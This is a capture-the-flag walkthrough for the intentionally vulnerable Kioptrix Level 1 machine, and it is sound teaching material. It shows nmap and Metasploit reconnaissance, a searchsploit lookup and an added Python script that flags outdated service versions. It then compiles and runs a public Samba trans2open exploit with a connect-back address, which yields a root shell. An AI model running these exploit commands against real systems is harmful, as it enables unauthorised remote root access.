
Kioptrix Level 1 Walkthrough

This is a walkthrough of the intentionally vulnerable machine Kioptrix. The object of the game is to acquire root access by any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques of vulnerability assessment and exploitation. There is more than one way to successfully complete the challenge.

So let’s get to it. First, we want to either run netdiscover or do an nmap scan to find the IP address of the target machine.

root@kali:~# nmap -sS 192.168.1.0/24
Nmap scan report for 192.168.1.104
Host is up (0.00014s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https
32768/tcp open filenet-tms
MAC Address: 08:00:27:97:A3:11 (Oracle VirtualBox virtual NIC)

Now that we’ve found the IP address of the target machine, we can run an nmap version scan to try to find out more information about the open ports.

root@kali:~# nmap -sV 192.168.1.104
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-22 18:53 CST
Nmap scan report for 192.168.1.104
Host is up (0.00013s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: ukOMYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
32768/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:97:A3:11 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.20 seconds
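Before moving on, here is an added example that is not part of the original walkthrough: a small Python triage script that parses the nmap -sV service lines above and flags products whose version is below a minimum baseline, or whose version nmap could not determine (the Samba case). The threshold table is an assumption for illustration, not an authoritative end-of-life list.

```python
import re

# Constructed sample input: the service lines copied from the nmap -sV scan above.
NMAP_SV_OUTPUT = """\
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: ukOMYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
32768/tcp open status 1 (RPC #100024)
"""

# Assumed minimum acceptable versions used for triage (illustrative thresholds only).
MIN_VERSIONS = {"openssh": (7, 4), "apache": (2, 4), "samba": (4, 0)}

LINE_RE = re.compile(r"^(\d+)/(?:tcp|udp)\s+open\s+(\S+)\s*(.*)$")
# Matches banners such as "OpenSSH 2.9p2", "Apache httpd 1.3.20", "Apache/1.3.20", "Samba smbd".
PRODUCT_RE = re.compile(
    r"\b(OpenSSH|Apache|Samba)(?:\s+httpd|\s+smbd)?[ /]?(\d+(?:\.\d+)*)?", re.I)

def version_tuple(text):
    """'1.3.20' -> (1, 3, 20); the regex already drops suffixes like the 'p2' in '2.9p2'."""
    return tuple(int(part) for part in text.split("."))

def triage(nmap_output):
    """Return one finding per tracked product: 'outdated', 'ok' or 'version-unknown'."""
    findings = []
    for line in nmap_output.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # header line or a line in a shape we do not parse
        port, service, banner = int(m.group(1)), m.group(2), m.group(3)
        pm = PRODUCT_RE.search(banner)
        if not pm:
            continue  # product not tracked (rpcbind, status)
        product = pm.group(1).lower()
        if pm.group(2) is None:
            status = "version-unknown"  # needs a protocol-specific probe (e.g. smb_version)
        elif version_tuple(pm.group(2)) < MIN_VERSIONS[product]:
            status = "outdated"
        else:
            status = "ok"
        findings.append({"port": port, "service": service, "product": product,
                         "version": pm.group(2), "status": status})
    return findings

if __name__ == "__main__":
    for f in triage(NMAP_SV_OUTPUT):
        print(f"{f['port']:>5}/{f['service']:<12} {f['product']:<8} {f['version'] or '?':<8} {f['status']}")
```

Run against the sample, it reports OpenSSH and both Apache listeners as outdated and Samba as version-unknown, which is exactly why the walkthrough reaches for the smb_version scanner next.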

We can see that it’s running Samba, but nmap doesn’t report the version. So let’s fire up Metasploit and run the smb_version auxiliary scanner to find the version number, so we can check whether it might be exploitable.

root@kali:~# msfconsole
msf5 > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.104
RHOSTS => 192.168.1.104
msf5 auxiliary(scanner/smb/smb_version) > exploit

[*] 192.168.1.104:139 - Host could not be identified: Unix (Samba 2.2.1a)
[*] 192.168.1.104:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_version) >

The scanner shows that the machine is running Samba 2.2.1a. To check whether a public exploit exists for that version, we can use searchsploit from the command line.

root@kali:~# searchsploit samba 2.2

Samba 2.0.x/2.2 - Arbitrary File Creat | exploits/unix/remote/20968.txt
Samba 2.2.0 < 2.2.8 (OSX) - trans2open | exploits/osx/remote/9924.rb
Samba 2.2.2 < 2.2.6 - 'nttrans' Remote | exploits/linux/remote/16321.rb
Samba 2.2.8 (BSD x86) - 'trans2open' R | exploits/bsd_x86/remote/16880.rb
Samba 2.2.8 (Linux Kernel 2.6 / Debian | exploits/linux/local/23674.txt
Samba 2.2.8 (Linux x86) - 'trans2open' | exploits/linux_x86/remote/16861.rb
Samba 2.2.8 (OSX/PPC) - 'trans2open' R | exploits/osx_ppc/remote/16876.rb
Samba 2.2.8 (Solaris SPARC) - 'trans2o | exploits/solaris_sparc/remote/16330.rb
Samba 2.2.8 - Brute Force Method Remot | exploits/linux/remote/55.c
Samba 2.2.x - 'call_trans2open' Remote | exploits/unix/remote/22468.c
Samba 2.2.x - 'call_trans2open' Remote | exploits/unix/remote/22469.c
Samba 2.2.x - 'call_trans2open' Remote | exploits/unix/remote/22470.c
Samba 2.2.x - 'call_trans2open' Remote | exploits/unix/remote/22471.txt
Samba 2.2.x - 'nttrans' Remote Overflo | exploits/linux/remote/9936.rb
Samba 2.2.x - CIFS/9000 Server A.01.x | exploits/unix/remote/22356.c
Samba 2.2.x - Remote Buffer Overflow | exploits/linux/remote/7.pl
Samba < 2.2.8 (Linux/BSD) - Remote Cod | exploits/multiple/remote/10.c

The very bottom entry seems to be exactly what we are looking for, as it targets any Samba version below 2.2.8. So let’s compile that exploit and run it against our target.

root@kali:~# cp /usr/share/exploitdb/exploits/multiple/remote/10.c 10.c
root@kali:~# gcc 10.c -o exploit10
root@kali:~# ./exploit10
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
Usage: ./exploit10 [-bBcCdfprsStv] [host]

-b bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)
-B bruteforce steps (default = 300)
-c connectback ip address
-C max childs for scan/bruteforce mode (default = 40)
-d bruteforce/scanmode delay in micro seconds (default = 100000)
-f force
-p port to attack (default = 139)
-r return address
-s scan mode (random)
-S scan mode
-t presets (0 for a list)
-v verbose mode
root@kali:~# ./exploit10 -b 0 -c 192.168.1.36 192.168.1.104


*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
cat /var/mail/root
From root Sat Sep 26 11:42:10 2009
Return-Path:
Received: (from root@localhost)
by kioptix.level1 (8.11.6/8.11.6) id n8QFgAZ01831
for root@kioptix.level1; Sat, 26 Sep 2009 11:42:10 -0400
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root
Message-Id: <200909261542.n8QFgAZ01831@kioptix.level1>
To: root@kioptix.level1
Subject: About Level 2
Status: O
If you are reading this, you got root. Congratulations.
Level 2 won’t be as easy…
